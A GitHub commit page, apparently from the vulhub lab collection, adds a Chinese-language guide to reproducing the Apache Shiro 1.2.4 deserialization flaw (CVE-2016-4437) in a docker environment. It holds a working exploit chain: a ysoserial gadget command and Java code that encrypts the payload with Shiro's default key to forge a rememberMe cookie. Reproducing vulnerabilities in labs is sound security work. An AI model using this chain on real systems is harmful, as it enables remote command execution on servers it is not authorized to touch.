Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
add Apache Shiro CVE-2016-4437 manual
- Loading branch information
Showing
2 changed files
with
56 additions
and
0 deletions.
There are no files selected for viewing
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,56 @@ | ||
# Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) | ||
|
||
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 | ||
|
||
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 | ||
|
||
## 漏洞环境 | ||
|
||
执行如下命令启动一个使用了Apache Shiro 1.2.4的Web服务: | ||
|
||
``` | ||
docker-compose up -d | ||
``` | ||
|
||
服务启动后,访问`http://your-ip:8080`可使用`admin:vulhub`进行登录。 | ||
|
||
## 漏洞复现 | ||
|
||
使用ysoserial生成CommonsBeanutils1的Gadget: | ||
|
||
``` | ||
java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser | ||
``` | ||
|
||
使用Shiro内置的默认密钥对Payload进行加密: | ||
|
||
```java | ||
package org.vulhub.shirodemo; | ||
|
||
import org.apache.shiro.crypto.AesCipherService; | ||
import org.apache.shiro.codec.CodecSupport; | ||
import org.apache.shiro.util.ByteSource; | ||
import org.apache.shiro.codec.Base64; | ||
import org.apache.shiro.io.DefaultSerializer; | ||
|
||
import java.nio.file.FileSystems; | ||
import java.nio.file.Files; | ||
import java.nio.file.Paths; | ||
|
||
public class TestRemember { | ||
public static void main(String[] args) throws Exception { | ||
byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser")); | ||
|
||
AesCipherService aes = new AesCipherService(); | ||
byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA==")); | ||
|
||
ByteSource ciphertext = aes.encrypt(payloads, key); | ||
System.out.printf(ciphertext.toString()); | ||
} | ||
} | ||
|
||
``` | ||
|
||
发送rememberMe Cookie,即可成功执行`touch /tmp/success`: | ||
|
||
![](1.png) |